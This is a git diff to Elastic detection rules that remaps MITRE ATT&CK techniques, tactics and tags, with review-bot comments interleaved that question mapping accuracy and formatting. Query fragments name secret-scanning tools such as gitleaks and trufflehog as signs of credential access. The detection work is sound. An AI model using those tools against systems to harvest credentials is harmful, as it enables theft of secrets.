+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
+
[[rule.threat.technique]]
id = "T1555"
name = "Credentials from Password Stores"
reference = "https://attack.mitre.org/techniques/T1555/"
+[[rule.threat.technique.subtechnique]]
+id = "T1555.001"
+name = "Keychain"
+reference = "https://attack.mitre.org/techniques/T1555/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1555.003"
+name = "Credentials from Web Browsers"
+reference = "https://attack.mitre.org/techniques/T1555/003/"
[rule.threat.tactic]
id = "TA0006"
name = "Credential Access"
reference = "https://attack.mitre.org/tactics/TA0006/"
+
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
-id = "T1005"
-name = "Data from Local System"
-reference = "https://attack.mitre.org/techniques/T1005/"
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+[[rule.threat.technique.subtechnique]]
+id = "T1546.004"
+name = "Unix Shell Configuration Modification"
+reference = "https://attack.mitre.org/techniques/T1546/004/"
[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/cross-platform/credential_access_gitleaks_execution.toml b/rules/cross-platform/credential_access_gitleaks_execution.toml
index f4efcf94595..85e8dd9bffd 100644
--- a/rules/cross-platform/credential_access_gitleaks_execution.toml
+++ b/rules/cross-platform/credential_access_gitleaks_execution.toml
@@ -2,7 +2,7 @@
creation_date = "2025/11/28"
integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"]
maturity = "production"
-updated_date = "2025/11/28"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -99,14 +99,14 @@ process.name : ("gitleaks.exe", "gitleaks")
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
-[[rule.threat.technique]]
-id = "T1555"
-name = "Credentials from Password Stores"
-reference = "https://attack.mitre.org/techniques/T1555/"
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
[rule.threat.tactic]
id = "TA0006"
diff --git a/rules/cross-platform/credential_access_trufflehog_execution.toml b/rules/cross-platform/credential_access_trufflehog_execution.toml
index b6faa0d1aee..358ef937467 100644
--- a/rules/cross-platform/credential_access_trufflehog_execution.toml
+++ b/rules/cross-platform/credential_access_trufflehog_execution.toml
@@ -2,7 +2,7 @@
creation_date = "2025/09/18"
integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"]
maturity = "production"
-updated_date = "2025/11/26"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -101,14 +101,14 @@ process.args == "--json" and process.args == "filesystem"
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
-[[rule.threat.technique]]
-id = "T1555"
-name = "Credentials from Password Stores"
-reference = "https://attack.mitre.org/techniques/T1555/"
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
[rule.threat.tactic]
id = "TA0006"
diff --git a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml
index 150a6573e2d..408663c99c1 100644
--- a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml
+++ b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml
@@ -2,7 +2,7 @@
creation_date = "2020/11/03"
integration = ["endpoint", "windows"]
maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -86,14 +86,18 @@ file where event.type == "deletion" and
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1070"
name = "Indicator Removal"
reference = "https://attack.mitre.org/techniques/T1070/"
+[[rule.threat.technique.subtechnique]]
+id = "T1070.004"
+name = "File Deletion"
+reference = "https://attack.mitre.org/techniques/T1070/004/"
[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml
index bb8a738a580..0e25e6a9182 100644
--- a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml
+++ b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml
@@ -2,7 +2,7 @@
creation_date = "2024/09/17"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -77,22 +77,23 @@ ROT encoding, a simple letter substitution cipher, is often used to obfuscate Py
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
+
[[rule.threat.technique]]
id = "T1027"
name = "Obfuscated Files or Information"
reference = "https://attack.mitre.org/techniques/T1027/"
+
[[rule.threat.technique.subtechnique]]
id = "T1027.013"
name = "Encrypted/Encoded File"
reference = "https://attack.mitre.org/techniques/T1027/013/"
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/cross-platform/defense_evasion_genai_config_modification.toml b/rules/cross-platform/defense_evasion_genai_config_modification.toml
index 812702a98d9..a7df32f5e59 100644
--- a/rules/cross-platform/defense_evasion_genai_config_modification.toml
+++ b/rules/cross-platform/defense_evasion_genai_config_modification.toml
@@ -2,7 +2,7 @@
creation_date = "2025/12/04"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/03/10"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -56,17 +56,7 @@ references = [
risk_score = 47
rule_id = "590fc62d-7386-4c75-92b0-af4517018da1"
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: macOS",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Persistence",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
- "Domain: LLM",
-]
+tags = ["Domain: Endpoint", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM"]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -104,29 +94,21 @@ file.path : (
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1554"
-name = "Compromise Host Software Binary"
-reference = "https://attack.mitre.org/techniques/T1554/"
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
[rule.threat.tactic]
id = "TA0003"
name = "Persistence"
reference = "https://attack.mitre.org/tactics/TA0003/"
-
[rule.new_terms]
field = "new_terms_fields"
value = ["process.executable"]
diff --git a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml
index 20e0c1c6df0..7a5756a489d 100644
--- a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml
+++ b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml
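Review bot: After this hunk the rule maps only to Persistence (T1546, T1574) and its tags no longer contain `Tactic: Defense Evasion`, yet the file keeps the `defense_evasion_genai_config_modification.toml` name, so the path now advertises a tactic the rule no longer claims. If the repository convention ties the filename prefix to the rule's primary tactic (the rest of the tree appears to follow that pattern), the file should be renamed in the same change rather than left to drift. The same prefix/tactic mismatch appears in the defense_evasion_genai_process_compiling_executables.toml hunks below, which now map only to Resource Development.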
@@ -2,7 +2,7 @@
creation_date = "2025/12/04"
integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "auditd_manager"]
maturity = "production"
-updated_date = "2025/12/04"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -58,23 +58,7 @@ references = [
risk_score = 47
rule_id = "b2c3d4e5-f6a7-8901-bcde-f123456789ab"
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "OS: macOS",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Data Source: Sysmon",
- "Data Source: Auditd Manager",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
- "Domain: LLM",
- "Mitre Atlas: T0053",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Resource Development", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Auditd Manager", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0053"]
timestamp_override = "event.ingested"
type = "eql"
@@ -140,19 +124,18 @@ process where event.type == "start" and
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1027"
-name = "Obfuscated Files or Information"
-reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique.subtechnique]]
-id = "T1027.004"
-name = "Compile After Delivery"
-reference = "https://attack.mitre.org/techniques/T1027/004/"
+[[rule.threat.technique]]
+id = "T1587"
+name = "Develop Capabilities"
+reference = "https://attack.mitre.org/techniques/T1587/"
+[[rule.threat.technique.subtechnique]]
+id = "T1587.001"
+name = "Malware"
+reference = "https://attack.mitre.org/techniques/T1587/001/"
[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
+id = "TA0042"
+name = "Resource Development"
+reference = "https://attack.mitre.org/tactics/TA0042/"
diff --git a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml
index 1f8053d9767..ec1658731b2 100644
--- a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml
+++ b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml
@@ -2,7 +2,7 @@
creation_date = "2025/12/04"
integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"]
maturity = "production"
-updated_date = "2025/12/04"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
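Review bot: Swapping T1027.004 (Compile After Delivery) for T1587.001 (Malware, under Resource Development) changes what this mapping asserts: T1587 describes capabilities an adversary builds outside the victim environment before an operation, whereas this rule fires on a compiler starting on the monitored host (`process where event.type == "start"` in the hunk header), which is exactly the on-victim compilation that T1027.004 describes. Unless the intent is to treat the monitored host as the adversary's development environment, keeping the `T1027` / `T1027.004` technique entry (alongside the new one if both are wanted) would be the more accurate mapping. Whichever is chosen, the tags hunk above removes both `Tactic: Execution` and `Tactic: Defense Evasion`, so the tag and threat sides at least stay consistent with each other.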
@@ -60,22 +60,7 @@ references = [ risk_score = 47 rule_id = "c3d4e5f6-a7b8-9012-cdef-123456789abc" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - "Domain: LLM", - "Mitre Atlas: T0086", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0086"] timestamp_override = "event.ingested" type = "eql" @@ -159,14 +144,39 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" 
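Review bot: The new Collection entry maps `T1560 Archive Collected Data` to a rule whose path (`…process_encoding_prior_to_network_activity`) and retained T1027 entry describe encoding of data before it leaves the host; T1560 covers archiving/compressing/encrypting collected data, whereas encoding for transport is `T1132 Data Encoding` (Command and Control), so T1132.001 may describe the encode-then-connect pattern more accurately than T1560. Likewise `T1020 Automated Exfiltration` asserts the transfer is scripted; if the `sequence by process.entity_id with maxspan=30s` query only sees an encoding process followed by an outbound connection, `T1041 Exfiltration Over C2 Channel` or `T1048 Exfiltration Over Alternative Protocol` is the less presumptive choice. The query body is outside this hunk, so confirm against it before changing the mapping.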
diff --git a/rules/cross-platform/defense_evasion_missing_events_after_alert.toml b/rules/cross-platform/defense_evasion_missing_events_after_alert.toml index 4b53205e011..a7a04ddf251 100644 --- a/rules/cross-platform/defense_evasion_missing_events_after_alert.toml +++ b/rules/cross-platform/defense_evasion_missing_events_after_alert.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,15 +58,7 @@ references = ["https://attack.mitre.org/techniques/T1562/001/"] risk_score = 73 rule_id = "fc552f49-8f1c-409b-90f8-6f5b9869b6c4" severity = "high" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
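Review bot: The new `tags` line in the second hunk puts `"Tactic: Defense Evasion"` second, ahead of the `Data Source:` and `Use Case:` tags, whereas the other rewritten tag lists in this patch (the genai and whitespace-padding rules, for example) keep `Tactic:` tags after `"Use Case: Threat Detection"`, and the three d4c rules and the service-account-token rule put `Tactic:` first. If a formatter normalizes tag order this will churn again on the next run; otherwise pick one ordering and apply it across the patch.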
@@ -78,38 +70,18 @@ sequence by host.id with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml index 31b65ceebca..74cb039c6db 100644 --- a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml +++ b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/30" integration = ["endpoint", "system", "windows", "auditd_manager", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -71,16 +71,7 @@ mean time to respond (MTTR). risk_score = 47 rule_id = "5a876e0d-d39a-49b9-8ad8-19c9b622203b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "OS: macOS", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -96,35 +87,18 @@ FROM logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml index c6e250f6b81..4d1929a052b 100644 --- a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml 
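Review bot: In the second hunk the added `[[rule.threat.technique.subtechnique]]` table for T1027.010 is placed directly after the T1027 `reference` line with no separating blank line, and `[rule.threat.tactic]` follows it the same way, while the same hunk inserts a blank line after `framework = "MITRE ATT&CK"` and the other threat hunks in this patch separate every table with one. TOML parses either way, but the section reads inconsistently; a blank line before each `[[rule.threat.technique.subtechnique]]` and `[rule.threat.tactic]` matches the rest of the patch.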
+++ b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -34,15 +34,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -89,14 +81,36 @@ Virtual machine fingerprinting involves identifying virtualized environments by [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml index 2f85b8138b9..62546661360 100644 --- a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml +++ b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml @@ -4,7 +4,7 @@ integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
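Review bot: The hunk replaces `T1082 System Information Discovery` with `T1497.001 System Checks` under Defense Evasion and repeats the identical T1497/T1497.001 block in a second `[[rule.threat]]` under Discovery; listing T1497 under both tactics matches ATT&CK, but a rule that greps system files for hypervisor strings is also a direct T1082 match and nothing in the hunk replaces that coverage. Keep `T1082` as an additional `[[rule.threat.technique]]` inside the Discovery entry rather than dropping it. Formatting is also uneven within the hunk: the first `[[rule.threat.technique.subtechnique]]` follows its `reference` line with no blank line while the second is separated by one.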
@@ -52,17 +52,7 @@ This rule surfaces successful GET requests containing directory traversal or dir risk_score = 21 rule_id = "90e4ceab-79a5-4f8e-879b-513cac7fcad9" severity = "low" -tags = [ - "Domain: Web", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Nginx", - "Data Source: Apache", - "Data Source: Apache Tomcat", - "Data Source: IIS", - "Data Source: Traefik", - "Resources: Investigation Guide", -] +tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -164,11 +154,24 @@ from framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml index 8ea0b32ead0..4db561f9f8f 100644 --- a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml +++ b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml 
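Review bot: After the second hunk this rule maps only Collection (T1005) and Initial Access (T1190) while its path is still `rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml`; if the file-name prefix is meant to track the primary tactic, the same mismatch now exists for `discovery_web_server_remote_file_inclusion_activity.toml` (Initial Access only), `execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml` and `execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml` (Discovery only) and `execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml` (Credential Access, Lateral Movement). Separately, the description context in the hunk header mentions requests "containing directory traversal or dir…"; if the query still matches directory-listing probes, those are `T1083 File and Directory Discovery`, which this hunk removes outright, so a Discovery entry with T1083 alongside the new T1005 would preserve that coverage.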
@@ -4,7 +4,7 @@ integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,18 +53,7 @@ This rule identifies successful GET requests that pass a remote URL or raw IP in risk_score = 21 rule_id = "45d099b4-a12e-4913-951c-0129f73efb41" severity = "low" -tags = [ - "Domain: Web", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Command and Control", - "Data Source: Nginx", - "Data Source: Apache", - "Data Source: Apache Tomcat", - "Data Source: IIS", - "Data Source: Traefik", - "Resources: Investigation Guide", -] +tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -117,19 +106,11 @@ from framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml index 8934cb47811..7b5a138dd69 100644 --- a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml 
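Review bot: The third hunk drops the Command and Control `[[rule.threat]]` entry entirely together with T1083, leaving only T1190 Initial Access; the removed C2 entry had no technique, which is presumably why it was cut, but a remote file inclusion makes the web server fetch attacker-hosted content, which is `T1105 Ingress Tool Transfer` under Command and Control. If the removal was meant to satisfy a tactic-needs-a-technique rule rather than to disown the C2 aspect, re-adding the entry with T1105 and restoring `"Tactic: Command and Control"` in the tags hunk above keeps that coverage.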
+++ b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/23" integration = ["aws", "endpoint"] maturity = "production" -updated_date = "2025/11/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,22 +77,7 @@ references = [ risk_score = 47 rule_id = "a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS CloudTrail", - "Data Source: AWS EC2", - "Data Source: AWS SSM", - "Data Source: AWS Systems Manager", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS EC2", "Data Source: AWS SSM", "Data Source: AWS Systems Manager", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" 
